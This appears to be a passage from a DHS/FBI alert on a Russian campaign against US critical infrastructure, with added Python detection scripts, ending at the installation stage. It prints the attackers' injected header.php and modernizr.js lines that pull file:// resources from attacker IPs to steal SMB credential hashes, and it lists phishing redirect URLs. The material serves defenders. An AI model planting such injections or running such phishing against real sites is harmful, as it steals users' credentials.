This joint Technical Alert (TA) is the result of analytic efforts between the Department of Homeland Security (DHS) and the Federal Bureau of Investigation (FBI). This alert provides information on Russian government actions targeting U.S. Government entities as well as organizations in the energy, nuclear, commercial facilities, water, aviation, and critical manufacturing sectors. It also contains indicators of compromise (IOCs) and technical details on the tactics, techniques, and procedures (TTPs) used by Russian government cyber actors on compromised victim networks. DHS and FBI produced this alert to educate network defenders to enhance their ability to identify and reduce exposure to malicious activity.

DHS and FBI characterize this activity as a multi-stage intrusion campaign by Russian government cyber actors who targeted small commercial facilities’ networks where they staged malware, conducted spear phishing, and gained remote access into energy sector networks. After obtaining access, the Russian government cyber actors conducted network reconnaissance, moved laterally, and collected information pertaining to Industrial Control Systems (ICS).

For a downloadable copy of IOC packages and associated files, see:

Contact DHS or law enforcement immediately to report an intrusion and to request incident response resources or technical assistance.

Description

Since at least March 2016, Russian government cyber actors—hereafter referred to as “threat actors”—targeted government entities and multiple U.S. critical infrastructure sectors, including the energy, nuclear, commercial facilities, water, aviation, and critical manufacturing sectors.

Analysis by DHS and FBI resulted in the identification of distinct indicators and behaviors related to this activity. Of note, the report Dragonfly: Western energy sector targeted by sophisticated attack group, released by Symantec on September 6, 2017, provides additional information about this ongoing campaign. [1]

This campaign comprises two distinct categories of victims: staging and intended targets. The initial victims are peripheral organizations such as trusted third-party suppliers with less secure networks, referred to as “staging targets” throughout this alert. The threat actors used the staging targets’ networks as pivot points and malware repositories when targeting their final intended victims. NCCIC and FBI judge the ultimate objective of the actors is to compromise organizational networks, also referred to as the “intended target.”

Technical Details

The threat actors in this campaign employed a variety of TTPs, including

  • spear-phishing emails (from compromised legitimate account),
  • watering-hole domains,
  • credential gathering,
  • open-source and network reconnaissance,
  • host-based exploitation, and
  • targeting industrial control system (ICS) infrastructure.

Using Cyber Kill Chain for Analysis

DHS used the Lockheed-Martin Cyber Kill Chain model to analyze, discuss, and dissect malicious cyber activity. Phases of the model include reconnaissance, weaponization, delivery, exploitation, installation, command and control, and actions on the objective. This section will provide a high-level overview of threat actors’ activities within this framework.

Stage 1: Reconnaissance

The threat actors appear to have deliberately chosen the organizations they targeted, rather than pursuing them as targets of opportunity. Staging targets held preexisting relationships with many of the intended targets. DHS analysis identified the threat actors accessing publicly available information hosted by organization-monitored networks during the reconnaissance phase. Based on forensic analysis, DHS assesses the threat actors sought information on network and organizational design and control system capabilities within organizations. These tactics are commonly used to collect the information needed for targeted spear-phishing attempts. In some cases, information posted to company websites, especially information that may appear to be innocuous, may contain operationally sensitive information. As an example, the threat actors downloaded a small photo from a publicly accessible human resources page. The image, when expanded, was a high-resolution photo that displayed control systems equipment models and status information in the background.

Analysis also revealed that the threat actors used compromised staging targets to download the source code for several intended targets’ websites. Additionally, the threat actors attempted to remotely access infrastructure such as corporate web-based email and virtual private network (VPN) connections.

Stage 2: Weaponization

Spear-Phishing Email TTPs

Throughout the spear-phishing campaign, the threat actors used email attachments to leverage legitimate Microsoft Office functions for retrieving a document from a remote server using the Server Message Block (SMB) protocol. (An example of this request is: file[:]//<remote IP address>/Normal.dotm). As a part of the standard processes executed by Microsoft Word, this request authenticates the client with the server, sending the user’s credential hash to the remote server before retrieving the requested file. (Note: transfer of credentials can occur even if the file is not retrieved.) After obtaining a credential hash, the threat actors can use password-cracking techniques to obtain the plaintext password. With valid credentials, the threat actors are able to masquerade as authorized users in environments that use single-factor authentication. [2]

Use of Watering Hole Domains

One of the threat actors’ primary uses for staging targets was to develop watering holes. Threat actors compromised the infrastructure of trusted organizations to reach intended targets. [3] Approximately half of the known watering holes are trade publications and informational websites related to process control, ICS, or critical infrastructure. Although these watering holes may host legitimate content developed by reputable organizations, the threat actors altered websites to contain and reference malicious content. The threat actors used legitimate credentials to access and directly modify the website content. The threat actors modified these websites by altering JavaScript and PHP files to request a file icon using SMB from an IP address controlled by the threat actors. This request accomplishes a similar technique observed in the spear-phishing documents for credential harvesting. In one instance, the threat actors added a line of code into the file “header.php”, a legitimate PHP file that carried out the redirected traffic.

<img src="file[:]//62.8.193[.]206/main_logo.png" style="height: 1px; width: 1px;" />

In another instance, the threat actors modified the JavaScript file, “modernizr.js”, a legitimate JavaScript library used by the website to detect various aspects of the user’s browser. The file was modified to contain the contents below:

var i = document.createElement("img");
i.src = "file[:]//184.154.150[.]66/ame_icon.png";
i.width = 3;
i.height = 2;
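Both injections above, and the Normal.dotm template trick described under the spear-phishing TTPs, rely on the same primitive: a reference to a file:// (SMB) resource on a host the attackers control, which makes the browser or Office client send a credential hash outbound. A defender reviewing web content or document templates can look for exactly that. The following scanner is an added example written for this page, not code from the alert or from DHS/FBI; the sample file contents and the TEST-NET addresses (203.0.113.7, 198.51.100.9) are constructed, and the set of "internal" ranges is an assumption you would replace with your own address plan.

```python
import ipaddress
import re
from typing import Dict, List

# Ranges treated as internal (assumed: RFC 1918, loopback, link-local). Anything else,
# including the TEST-NET addresses used in the constructed samples, counts as external.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
                  "127.0.0.0/8", "169.254.0.0/16")]

# file://host/path, or the UNC spelling file:\\host\path; captures host and path.
FILE_URL_RE = re.compile(r"file:(?://|\\\\)([A-Za-z0-9._-]+)([/\\][^\s\"'<>]*)?",
                         re.IGNORECASE)


def is_external_host(host: str, trusted_hosts=frozenset()) -> bool:
    """True when a file:// reference to `host` would reach outside the internal ranges."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        # A host name cannot be resolved offline; only explicitly trusted names pass.
        return host.lower() not in trusted_hosts
    return not any(ip in net for net in INTERNAL_NETS)


def find_file_references(name: str, content: str,
                         trusted_hosts=frozenset()) -> List[Dict[str, object]]:
    """Return every file:// reference in `content`, tagged with whether its host is external."""
    findings = []
    for lineno, line in enumerate(content.splitlines(), 1):
        for m in FILE_URL_RE.finditer(line):
            host = m.group(1)
            findings.append({
                "file": name,
                "line": lineno,
                "host": host,
                "path": m.group(2) or "",
                "external": is_external_host(host, trusted_hosts),
                "snippet": line.strip()[:120],
            })
    return findings


# Constructed samples modelled on the two modifications described in the alert
# (header.php and modernizr.js); addresses are RFC 5737 placeholders, not the alert's IOCs.
SAMPLE_FILES = {
    "header.php": '<?php include "config.php"; ?>\n'
                  '<img src="file://203.0.113.7/main_logo.png" style="height: 1px; width: 1px;" />\n',
    "modernizr.js": 'window.Modernizr = window.Modernizr || {};\n'
                    'var i = document.createElement("img");\n'
                    'i.src = "file://198.51.100.9/ame_icon.png";\n'
                    'i.width = 3;\n'
                    'i.height = 2;\n',
    "intranet.html": '<a href="file://10.0.0.5/share/policy.docx">Policy</a>\n',
    "clean.js": 'var logo = new Image();\nlogo.src = "/static/logo.png";\n',
}


def scan_samples() -> List[Dict[str, object]]:
    """Scan the constructed samples; returns the full finding list (external and internal)."""
    findings = []
    for name, content in SAMPLE_FILES.items():
        findings.extend(find_file_references(name, content))
    return findings


if __name__ == "__main__":
    for f in scan_samples():
        flag = "EXTERNAL" if f["external"] else "internal"
        print(f'{flag:8} {f["file"]}:{f["line"]} -> {f["host"]}{f["path"]}')
```

Run it over a web root or over the XML inside .docx/.dotm files (after unzipping) the same way; a legitimate public site has no reason to reference a file:// resource at all, so on a web server even the internal hits deserve a look.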

Stage 3: Delivery

When compromising staging target networks, the threat actors used spear-phishing emails that differed from previously reported TTPs. The spear-phishing emails used a generic contract agreement theme (with the subject line “AGREEMENT & Confidential”) and contained a generic PDF document titled “``document.pdf”. (Note the inclusion of two single back ticks at the beginning of the attachment name.) The PDF was not malicious and did not contain any active code. The document contained a shortened URL that, when clicked, led users to a website that prompted the user for email address and password. (Note: no code within the PDF initiated a download.)

In previous reporting, DHS and FBI noted that all of these spear-phishing emails referred to control systems or process control systems. The threat actors continued using these themes specifically against intended target organizations. Email messages included references to common industrial control equipment and protocols. The emails used malicious Microsoft Word attachments that appeared to be legitimate résumés or curricula vitae (CVs) for industrial control systems personnel, and invitations and policy documents to entice the user to open the attachment.

Stage 4: Exploitation

The threat actors used distinct and unusual TTPs in the phishing campaign directed at staging targets. Emails contained successive redirects: a http://bit[.]ly/2m0x8IH link redirected to http://tinyurl[.]com/h3sdqck, which in turn redirected to the ultimate destination, http://imageliners[.]com/nitel. The imageliners[.]com website contained input fields for an email address and password, mimicking a login page.

When exploiting the intended targets, the threat actors used malicious .docx files to capture user credentials. The documents retrieved a file through a “file://” connection over SMB using Transmission Control Protocol (TCP) ports 445 or 139. This connection is made to a command and control (C2) server—either a server owned by the threat actors or that of a victim. When a user attempted to authenticate to the domain, the C2 server was provided with the hash of the password. Local users received a graphical user interface (GUI) prompt to enter a username and password, and the C2 received this information over TCP ports 445 or 139. (Note: a file transfer is not necessary for a loss of credential information.) Symantec’s report associates this behavior with the Dragonfly threat actors in this campaign. [1]
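Because the credential leak happens over TCP 445 or 139 to a host outside the organization, the network side of this stage is easy to spot in perimeter logs: an internal workstation should never open SMB to the internet, and a denied attempt is still evidence that someone opened a poisoned document or page. The detection below is an added example for this page, not tooling from the alert; the firewall log format (timestamp, firewall name, key=value fields) and all addresses are constructed, and the internal ranges are an assumption to adjust for your network.

```python
import ipaddress
import re
from collections import defaultdict
from typing import Dict, List

SMB_PORTS = {445, 139}
KV_RE = re.compile(r"(\w+)=(\S+)")

# Ranges treated as the organization's own (assumed: RFC 1918, loopback, link-local).
# The TEST-NET addresses in the constructed log therefore count as external.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
                  "127.0.0.0/8", "169.254.0.0/16")]


def is_internal(addr: str) -> bool:
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in INTERNAL_NETS)


def parse_line(line: str) -> Dict[str, str]:
    """Parse '<timestamp> <firewall> key=value ...' (constructed format) into a dict."""
    ts, fw, rest = line.split(" ", 2)
    fields = dict(KV_RE.findall(rest))
    fields["ts"], fields["fw"] = ts, fw
    return fields


def find_external_smb(lines) -> List[Dict[str, str]]:
    """Keep TCP flows to 445/139 whose destination lies outside the internal ranges.
    Denied flows are kept as well: the block stops the hash from leaving, but the
    attempt itself shows a host processed a file:// reference to an external server."""
    hits = []
    for line in lines:
        if not line.strip():
            continue
        f = parse_line(line)
        if f.get("proto") != "tcp" or int(f.get("dport", 0)) not in SMB_PORTS:
            continue
        if is_internal(f["dst"]):
            continue
        hits.append(f)
    return hits


def summarize(hits) -> Dict[str, List[str]]:
    """Group flagged flows by external destination. Several internal sources reaching
    the same external SMB host is the shape a watering hole or mass mailing produces."""
    by_dst = defaultdict(set)
    for h in hits:
        by_dst[h["dst"]].add(h["src"])
    return {dst: sorted(srcs) for dst, srcs in by_dst.items()}


# Constructed sample log: two workstations touching one external host on SMB ports,
# a normal HTTPS flow, a UDP flow (ignored), and a denied SMB attempt to a second host.
SAMPLE_LOG = """\
2018-03-15T10:01:02Z fw01 action=allow proto=tcp src=10.1.5.23 dst=10.1.0.10 dport=445
2018-03-15T10:01:09Z fw01 action=allow proto=tcp src=10.1.5.23 dst=203.0.113.7 dport=445
2018-03-15T10:01:11Z fw01 action=allow proto=tcp src=10.1.7.41 dst=203.0.113.7 dport=139
2018-03-15T10:02:30Z fw01 action=allow proto=tcp src=10.1.5.23 dst=198.51.100.20 dport=443
2018-03-15T10:03:00Z fw01 action=allow proto=udp src=10.1.5.23 dst=203.0.113.7 dport=445
2018-03-15T10:04:15Z fw01 action=deny proto=tcp src=10.1.9.8 dst=198.51.100.9 dport=445
"""

if __name__ == "__main__":
    hits = find_external_smb(SAMPLE_LOG.splitlines())
    for h in hits:
        print(f'{h["ts"]} {h["action"]:5} {h["src"]} -> {h["dst"]}:{h["dport"]}')
    print(summarize(hits))
```

The allowed entries are the ones to treat as probable credential exposure (the hash was sent regardless of whether the file came back); the source hosts in the summary are where the triage starts, and the destination list feeds the egress block that should have existed in the first place.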

Stage 5: Installation

The threat actors leveraged compromised credentials to access victims’ networks where multi-factor authentication was not used. [4] To maintain persistence, the threat actors created local administrator accounts within staging targets and placed malicious files within intended targets.

Establishing Local Accounts

The threat actors used scripts to create local administrator accounts disguised as legitimate backup accounts. The initial script “symantec_help.jsp” contained a one-line reference to a malicious script designed to create the local administrator account and manipulate the firewall for remote access. The script was located in “C:\Program Files (x86)\Symantec\Symantec Endpoint Protection Manager\tomcat\webapps\ROOT\”.
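The persistence described here leaves a very regular trace in the Windows Security log: a local account appears (event 4720) and seconds later the same account is added to the local Administrators group (event 4732), usually by a service or application identity rather than an administrator at a console. The correlation below is an added example for this page, not part of the alert; the event records are constructed in a simplified export shape (field names are shortened from the real schema, hosts and account names are invented), while the event IDs and the well-known Administrators SID S-1-5-32-544 are real Windows values.

```python
from datetime import datetime, timedelta
from typing import Dict, List

# Real Windows identifiers used below:
#   4720          A user account was created
#   4732          A member was added to a security-enabled local group
#   S-1-5-32-544  Built-in Administrators (group names are localized, the SID is not)
EVENT_ACCOUNT_CREATED = 4720
EVENT_LOCAL_GROUP_ADD = 4732
ADMINISTRATORS_SID = "S-1-5-32-544"
BACKUP_WORDS = ("backup", "bkup", "bak")   # themes the alert says the accounts mimicked

# Constructed sample events (simplified export format; hosts and accounts are invented).
SAMPLE_EVENTS = [
    {"time": "2018-03-01T02:11:05", "id": 4720, "host": "SEPM01", "subject": "svc_tomcat",
     "target": "backup_admin"},
    {"time": "2018-03-01T02:11:07", "id": 4732, "host": "SEPM01", "subject": "svc_tomcat",
     "target": "backup_admin", "group_sid": "S-1-5-32-544"},
    {"time": "2018-03-01T09:30:00", "id": 4720, "host": "HR-WS12", "subject": "helpdesk",
     "target": "jsmith"},
    {"time": "2018-03-02T14:05:00", "id": 4732, "host": "FS02", "subject": "itadmin",
     "target": "fs_backup", "group_sid": "S-1-5-32-551"},   # Backup Operators, not admins
    {"time": "2018-03-03T11:00:00", "id": 4732, "host": "HR-WS12", "subject": "helpdesk",
     "target": "jsmith", "group_sid": "S-1-5-32-544"},      # two days later: routine
]


def find_create_and_elevate(events, window=timedelta(minutes=10)) -> List[Dict[str, object]]:
    """Flag accounts added to local Administrators within `window` of being created
    on the same host. Two passes, so the input need not be sorted."""
    created = {}  # (host, account) -> creation time
    for e in events:
        if e["id"] == EVENT_ACCOUNT_CREATED:
            created[(e["host"], e["target"].lower())] = datetime.fromisoformat(e["time"])

    alerts = []
    for e in events:
        if e["id"] != EVENT_LOCAL_GROUP_ADD or e.get("group_sid") != ADMINISTRATORS_SID:
            continue
        key = (e["host"], e["target"].lower())
        when = datetime.fromisoformat(e["time"])
        if key in created and timedelta(0) <= when - created[key] <= window:
            alerts.append({
                "host": e["host"],
                "account": e["target"],
                "created_by": e["subject"],
                "seconds_after_creation": int((when - created[key]).total_seconds()),
                "backup_themed": any(w in e["target"].lower() for w in BACKUP_WORDS),
            })
    return alerts


if __name__ == "__main__":
    for a in find_create_and_elevate(SAMPLE_EVENTS):
        print(f'{a["host"]}: {a["account"]} created by {a["created_by"]} and made '
              f'local admin {a["seconds_after_creation"]}s later '
              f'(backup-themed name: {a["backup_themed"]})')
```

The "created by" field is the useful pivot: an account minted by the identity a web application runs under, as the Tomcat-hosted script location above implies, is a stronger signal than the account name, which the actors chose precisely to look routine.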